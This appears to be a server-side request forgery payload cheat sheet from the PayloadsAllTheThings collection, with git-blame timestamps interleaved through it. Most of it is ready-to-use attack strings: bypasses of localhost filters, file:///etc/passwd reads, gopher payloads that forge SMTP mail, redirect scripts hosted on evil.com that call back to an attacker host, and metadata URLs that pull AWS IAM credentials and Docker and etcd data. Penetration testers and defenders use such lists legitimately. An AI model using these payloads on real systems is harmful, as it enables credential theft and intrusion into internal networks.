2017-06-17 21:20:24 +00:00
# Server-Side Request Forgery
2018-08-12 21:30:22 +00:00
2018-10-11 03:54:18 +00:00
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
2016-10-18 08:01:56 +00:00
2018-10-18 15:32:01 +00:00
Tools:
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap ](https://github.com/swisskyrepo/SSRFmap )
- [Gopherus - https://github.com/tarunkant/Gopherus ](https://github.com/tarunkant/Gopherus )
2018-08-11 22:17:58 +00:00
## Summary
2018-08-12 21:30:22 +00:00
* [Exploit with localhost ](#summary )
* [Bypassing filters ](#summary )
* [SSRF via URL Scheme ](#summary )
* [SSRF to XSS ](#summary )
* [SSRF URL for Cloud Instances ](#summary )
* [SSRF URL for AWS Bucket ](#summary )
* [SSRF URL for Google Cloud ](#summary )
* [SSRF URL for Digital Ocean ](#summary )
* [SSRF URL for Packetcloud ](#summary )
* [SSRF URL for Azure ](#summary )
* [SSRF URL for OpenStack/RackSpace ](#summary )
* [SSRF URL for HP Helion ](#summary )
* [SSRF URL for Oracle Cloud ](#summary )
* [SSRF URL for Alibaba ](#summary )
2018-08-11 22:17:58 +00:00
2017-09-27 12:37:07 +00:00
## Exploit with localhost
2016-10-18 08:01:56 +00:00
2016-10-18 07:54:41 +00:00
Basic SSRF v1
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 07:54:41 +00:00
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
2017-09-27 12:37:07 +00:00
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
2016-10-18 07:54:41 +00:00
```
2018-08-12 21:30:22 +00:00
Basic SSRF - Alternative version
```powershell
2016-10-18 07:54:41 +00:00
http://localhost:80
http://localhost:443
http://localhost:22
```
2017-06-17 21:20:24 +00:00
Advanced exploit using a redirection
2018-08-12 21:30:22 +00:00
```powershell
2017-06-17 21:20:24 +00:00
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
```
Advanced exploit using type=url
2018-08-12 21:30:22 +00:00
```powershell
2017-06-17 21:20:24 +00:00
Change "type=file" to "type=url"
Paste URL in text field and hit enter
2017-07-30 11:17:00 +00:00
Using this vulnerability users can upload images from any image URL = trigger an SSRF
2017-06-17 21:20:24 +00:00
```
2017-09-27 12:37:07 +00:00
## Bypassing filters
2018-08-12 21:30:22 +00:00
2018-02-15 22:27:42 +00:00
Bypass using HTTPS
2018-08-12 21:30:22 +00:00
```powershell
2018-02-15 22:27:42 +00:00
https://127.0.0.1/
https://localhost/
```
2016-10-18 07:54:41 +00:00
Bypass localhost with [::]
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 07:54:41 +00:00
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
```
2018-08-12 21:30:22 +00:00
```powershell
2017-11-09 08:05:50 +00:00
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```
2016-10-18 07:54:41 +00:00
Bypass localhost with a domain redirecting to locahost
2018-08-12 21:30:22 +00:00
```powershell
2018-02-15 22:27:42 +00:00
http://localtest.me
2018-04-12 21:23:41 +00:00
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
2018-10-29 21:22:10 +00:00
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
2018-04-12 21:23:41 +00:00
```
2018-08-12 21:30:22 +00:00
2018-04-12 21:23:41 +00:00
The service nip.io is awesome for that, it will convert any ip address as a dns.
2018-08-12 21:30:22 +00:00
```powershell
2018-04-12 21:23:41 +00:00
NIP.IO maps < anything > .< IP Address > .nip.io to the corresponding < IP Address > , even 127.0.0.1.nip.io maps to 127.0.0.1
2016-10-18 08:01:56 +00:00
```
2017-09-27 12:37:07 +00:00
Bypass localhost with CIDR : 127.x.x.x
2018-08-12 21:30:22 +00:00
```powershell
2017-09-27 12:37:07 +00:00
it's a /8
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
```
2017-06-17 21:20:24 +00:00
Bypass using a decimal ip location
2018-08-12 21:30:22 +00:00
```powershell
2017-09-27 12:37:07 +00:00
http://0177.0.0.1/
2017-06-17 21:20:24 +00:00
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```
Bypass using malformed urls
2018-08-12 21:30:22 +00:00
```powershell
2017-01-07 19:51:47 +00:00
localhost:+11211aaa
localhost:00011211aaaa
2017-06-17 21:20:24 +00:00
```
2017-01-07 19:51:47 +00:00
2017-07-30 11:17:00 +00:00
Bypass using rare address
2018-08-12 21:30:22 +00:00
```powershell
2017-07-30 11:17:00 +00:00
http://0/
```
2018-03-12 08:17:31 +00:00
Bypass using bash variables (curl only)
2018-08-12 21:30:22 +00:00
```powershell
curl -v "http://evil$google.com"
2018-03-12 08:17:31 +00:00
$google = ""
```
2017-07-30 11:17:00 +00:00
Bypass using tricks combination
2018-08-12 21:30:22 +00:00
```powershell
2017-07-30 11:17:00 +00:00
http://1.1.1.1 & @2.2.2.2# @3 .3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```
2017-11-19 13:01:36 +00:00
Bypass using enclosed alphanumerics [@EdOverflow ](https://twitter.com/EdOverflow )
2018-08-12 21:30:22 +00:00
```powershell
2017-11-19 13:01:36 +00:00
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
2018-08-23 17:15:15 +00:00
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
```powershell
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127 .2.2.2:80/
http://127.1.1.1:80:\@@127 .2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
```
2018-08-23 17:16:38 +00:00
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png ](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg )
2018-08-23 17:15:15 +00:00
2017-08-07 19:42:14 +00:00
## SSRF via URL Scheme
2018-03-12 08:17:31 +00:00
2018-08-19 14:32:26 +00:00
File Wrapper
```powershell
file:///etc/passwd
file://\/\/etc/passwd
```
2018-08-12 21:30:22 +00:00
Dict Wrapper
2017-08-07 19:42:14 +00:00
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
2018-08-12 21:30:22 +00:00
```powershell
2017-08-07 19:42:14 +00:00
dict://< user > ;< auth > @< host > :< port > /d:< word > :< database > :< n >
ssrf.php?url=dict://attacker:11111/
```
2018-08-12 21:30:22 +00:00
Sftp Wrapper
```powershell
2017-08-07 19:42:14 +00:00
ssrf.php?url=sftp://evil.com:11111/
```
2018-08-12 21:30:22 +00:00
Tftp Wrapper
```powershell
2017-08-07 19:42:14 +00:00
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
```
2018-08-12 21:30:22 +00:00
Ldap Wrapper
```powershell
2017-08-07 19:42:14 +00:00
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
```
2018-08-12 21:30:22 +00:00
Gopher Wrapper
```powershell
2017-09-19 18:35:18 +00:00
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:< hacker @ site . com >
RCPT TO:< victim @ site . com >
DATA
From: [Hacker] < hacker @ site . com >
To: < victime @ site . com >
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH
You didn't say the magic word !
.
QUIT
```
2017-08-07 19:42:14 +00:00
2018-08-12 21:30:22 +00:00
Gopher SMTP - Back connect to 1337
2018-02-15 22:27:42 +00:00
```php
Content of evil.com/redirect.php:
< ?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```
2018-08-12 21:30:22 +00:00
Gopher SMTP - send a mail
2018-02-15 22:27:42 +00:00
```php
Content of evil.com/redirect.php:
< ?php
$commands = array(
'HELO victim.com',
'MAIL FROM: < admin @ victim . com > ',
'RCPT To: < sxcurity @ oou . us > ',
'DATA',
'Subject: @sxcurity !',
'Corben was here, woot woot!',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
```
2018-06-05 22:05:28 +00:00
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
2018-08-12 21:30:22 +00:00
2018-06-05 22:05:28 +00:00
```bash
2018-08-12 21:30:22 +00:00
http://brutelogic.com.br/poc.svg -> simple alert
2018-06-05 22:05:28 +00:00
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```
2018-08-11 22:17:58 +00:00
## SSRF URL for Cloud Instances
2018-08-12 21:30:22 +00:00
2018-08-11 22:17:58 +00:00
### SSRF URL for AWS Bucket
2018-08-12 21:30:22 +00:00
2018-08-11 22:17:58 +00:00
[Docs ](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories )
2018-08-12 21:30:22 +00:00
Interesting path to look for at `http://169.254.169.254`
```powershell
2017-09-27 12:37:07 +00:00
Always here : /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling) : /latest/user-data
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
```
DNS record
2018-08-12 21:30:22 +00:00
```powershell
2017-09-27 12:37:07 +00:00
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/
http://1ynrnhl.xip.io/
http://www.owasp.org.1ynrnhl.xip.io/
```
HTTP redirect
2018-08-12 21:30:22 +00:00
```powershell
2017-09-27 12:37:07 +00:00
Static:http://nicob.net/redir6a
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
```
Alternate IP encoding
2018-08-12 21:30:22 +00:00
```powershell
2017-09-27 12:37:07 +00:00
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
```
2018-05-27 20:27:31 +00:00
More urls to include
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
2018-11-13 22:25:18 +00:00
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
2018-05-27 20:27:31 +00:00
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
2018-08-26 13:43:26 +00:00
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
2018-05-27 20:27:31 +00:00
```
2018-08-11 22:17:58 +00:00
### SSRF URL for Google Cloud
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
```
2018-08-12 21:30:22 +00:00
Google allows recursive pulls
```powershell
2018-05-27 20:27:31 +00:00
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
```
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn )
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://metadata.google.internal/computeMetadata/v1beta1/
```
2018-08-11 22:17:58 +00:00
### SSRF URL for Digital Ocean
2018-08-12 21:30:22 +00:00
Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
2018-07-15 09:06:43 +00:00
```powershell
curl http://169.254.169.254/metadata/v1/id
2018-05-27 20:27:31 +00:00
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
2018-07-15 09:06:43 +00:00
All in one request:
curl http://169.254.169.254/metadata/v1.json | jq
2018-05-27 20:27:31 +00:00
```
2018-08-11 22:17:58 +00:00
### SSRF URL for Packetcloud
2018-08-12 21:30:22 +00:00
Documentation available at `https://metadata.packet.net/userdata`
2018-05-27 20:27:31 +00:00
2018-08-11 22:17:58 +00:00
### SSRF URL for Azure
2018-08-12 21:30:22 +00:00
Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/metadata/v1/maintenance
```
2018-08-12 21:30:22 +00:00
Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02& format=text
```
2018-08-12 21:30:22 +00:00
### SSRF URL for OpenStack/RackSpace
2018-05-27 20:27:31 +00:00
(header required? unknown)
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/openstack
```
2018-08-12 21:30:22 +00:00
### SSRF URL for HP Helion
2018-05-27 20:27:31 +00:00
(header required? unknown)
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://169.254.169.254/2009-04-04/meta-data/
```
2018-08-11 22:17:58 +00:00
### SSRF URL for Oracle Cloud
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
2018-08-11 22:17:58 +00:00
### SSRF URL for Alibaba
2018-08-12 21:30:22 +00:00
```powershell
2018-05-27 20:27:31 +00:00
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
2017-09-27 12:37:07 +00:00
2018-08-19 14:32:26 +00:00
### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
```powershell
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
### SSRF URL for Docker
```powershell
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
2018-10-08 19:46:57 +00:00
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/< version > /< path >
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
2018-08-19 14:32:26 +00:00
2016-10-18 08:01:56 +00:00
## Thanks to
2018-08-12 21:30:22 +00:00
2017-06-17 21:20:24 +00:00
* [Hackerone - How To: Server-Side Request Forgery (SSRF) ](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF )
2017-07-30 11:17:00 +00:00
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA ](https://twitter.com/albinowax/status/890725759861403648 )
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai ](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html )
2017-11-19 13:01:36 +00:00
* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai ](https://www.youtube.com/watch?v=D1S-G8rJrEk )
2017-08-07 19:42:14 +00:00
* [SSRF Tips - xl7dev ](http://blog.safebuff.com/2016/07/03/SSRF-Tips/ )
* [SSRF in https://imgur.com/vidgif/url ](https://hackerone.com/reports/115748 )
2017-09-19 18:35:18 +00:00
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat ](https://www.dailysecurity.fr/server-side-request-forgery/ )
2017-09-27 12:37:07 +00:00
* [AppSecEU15 Server side browsing considered harmful - @Agarri ](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf )
2017-11-19 13:01:36 +00:00
* [Enclosed alphanumerics - @EdOverflow ](https://twitter.com/EdOverflow )
2018-02-15 22:27:42 +00:00
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity ](http://www.sxcurity.pro/2017/12/17/hackertarget/ )
2018-03-12 08:17:31 +00:00
* [PHP SSRF @secjuice ](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51 )
2018-06-05 22:05:28 +00:00
* [How I convert SSRF to xss in a ssrf vulnerable Jira ](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158 )
2018-10-08 19:46:57 +00:00
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access ](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a )
2018-10-31 21:34:10 +00:00
* [Hacker101 SSRF ](https://www.youtube.com/watch?v=66ni2BTIjS8 )